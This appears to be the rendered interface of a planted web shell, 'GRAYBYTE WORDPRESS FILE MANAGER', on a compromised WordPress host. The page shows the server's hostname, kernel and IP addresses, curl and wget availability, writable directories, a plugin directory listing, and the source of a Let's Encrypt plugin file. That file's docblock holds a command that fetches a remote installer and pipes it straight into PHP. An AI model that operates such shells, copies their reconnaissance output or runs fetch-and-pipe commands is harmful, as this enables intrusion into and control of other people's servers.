✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ webm004.cluster127.gra.hosting.ovh.net ​🇻​♯➤ 6.18.42-ovh-vps-grsec-zfs+ #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 54.36.91.62 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.191
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ _dyuweyrj4,_dyuweyrj4r,dl

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/docteuh/www/Cache-20260907200220/lets-encrypt//letsencrypt.php
<?php
defined('ABSPATH') or die();
/**
 * Capability handling for Let's Encrypt
 * @return bool
 *
 * php -r "readfile('https://getcomposer.org/installer');" | php
 */
if (!function_exists('rsssl_letsencrypt_generation_allowed')) {
	function rsssl_letsencrypt_generation_allowed($strict = false) {
        $certificateGeneratedByRsssl = get_option('rsssl_le_certificate_generated_by_rsssl');

		/**
		 * LE classes should also run if SSL is generated by rsssl, the plus one
         * cache is cleared or when the cron runs
		 */
		if ($certificateGeneratedByRsssl && (
            !get_option('rsssl_plusone_count') || wp_doing_cron()
        )) {
			return apply_filters('rsssl_letsencrypt_generation_allowed', true, $strict);
		}

		if (current_user_can('manage_security') === false) {
            return apply_filters('rsssl_letsencrypt_generation_allowed', false, $strict);
		}

		if ( isset($_GET['letsencrypt'])) {
            return apply_filters('rsssl_letsencrypt_generation_allowed', true, $strict);
		}

        /**
         * Filter: 'rsssl_letsencrypt_generation_allowed'
         *
         * Can be used to override the default behavior of allowing or
         * disallowing Let's Encrypt certificate generation.
         *
         * @param bool $allowed
         * @param bool $strict
         * @return bool
         */
        return apply_filters('rsssl_letsencrypt_generation_allowed', false, $strict);
	}
}

class RSSSL_LETSENCRYPT {
	private static $instance;

	public $le_restapi;
	public $field;
	public $hosts;
	public $letsencrypt_handler;

	private function __construct() {
	}



	public static function instance() {
		if ( ! isset( self::$instance ) && ! ( self::$instance instanceof RSSSL_LETSENCRYPT ) ) {
			self::$instance = new RSSSL_LETSENCRYPT;
			self::$instance->setup_constants();
			self::$instance->includes();
			self::$instance->hosts = new rsssl_le_hosts();
			if ( rsssl_letsencrypt_generation_allowed() ) {
				self::$instance->letsencrypt_handler = new rsssl_letsencrypt_handler();
				self::$instance->le_restapi = new rsssl_le_restapi();
			}
		}

		return self::$instance;
	}

	private function setup_constants() {
		define('rsssl_le_url', plugin_dir_url(__FILE__));
		define('rsssl_le_path', trailingslashit(plugin_dir_path(__FILE__)));
	}

	private function includes() {
		require_once( rsssl_le_path . 'functions.php');
		require_once( rsssl_le_path . 'config/class-hosts.php' );
		if ( rsssl_letsencrypt_generation_allowed() ) {
			require_once( rsssl_le_path . 'config/fields.php');
			require_once( rsssl_le_path . 'class-le-restapi.php' );
			require_once( rsssl_le_path . 'class-letsencrypt-handler.php' );
			require_once( rsssl_le_path . 'integrations/integrations.php' );
		}
		require_once( rsssl_le_path . 'config/notices.php' );
	}

	/**
	 * Notice about possible compatibility issues with add ons
	 */
	public static function admin_notices() {

	}
}

function RSSSL_LE() {
	return RSSSL_LETSENCRYPT::instance();
}

add_action( 'plugins_loaded', 'RSSSL_LE', 9 );


class RSSSL_RESPONSE
{
	public $message;
	public $action;
	public $status;
	public $output;
	public $request_success;

	public function __construct($status, $action, $message, $output = false )
	{
		$this->status = $status;
		$this->action = $action;
		$this->message = $message;
		$this->output = $output;
		$this->request_success = true;
	}

}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
27 Sep 2026 5.22 AM
docteuh / users
0755
config
--
27 Aug 2026 2.34 PM
docteuh / users
0755
integrations
--
27 Aug 2026 5.31 PM
docteuh / users
0755
vendor
--
27 Aug 2026 2.34 PM
docteuh / users
0755
class-le-restapi.php
8.019 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
class-letsencrypt-handler.php
69.864 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
composer.json
0.095 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
cron.php
1.461 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
download.php
2.63 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
force-deactivate.txt
3.778 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
functions.php
16.779 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
icon-redirect-manager.svg
1.299 KB
23 Jun 2026 6.19 PM
docteuh / users
0644
index.php
0.034 KB
18 Jun 2026 6.25 PM
docteuh / users
0644
letsencrypt.php
3.296 KB
18 Jun 2026 6.25 PM
docteuh / users
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF